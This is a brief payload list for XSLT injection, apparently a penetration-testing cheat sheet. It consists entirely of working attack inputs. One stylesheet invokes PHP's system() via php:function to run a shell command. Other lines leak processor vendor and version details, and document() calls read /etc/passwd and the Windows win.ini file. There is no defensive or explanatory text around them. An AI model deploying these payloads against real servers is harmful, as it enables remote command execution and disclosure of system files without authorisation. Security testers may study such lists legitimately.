<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
    <xsl:template match="/">
        <xsl:value-of select="php:function('system', 'ls -la')"/>
    </xsl:template>
</xsl:stylesheet>

<!-- Information Leak -->
<xsl:value-of select="system-property('xsl:vendor')"/>
<xsl:value-of select="system-property('xsl:version')"/>

<!-- File Read -->
<xsl:value-of select="document('file:///etc/passwd')"/>
<xsl:value-of select="document('file:///C:/Windows/win.ini')"/>
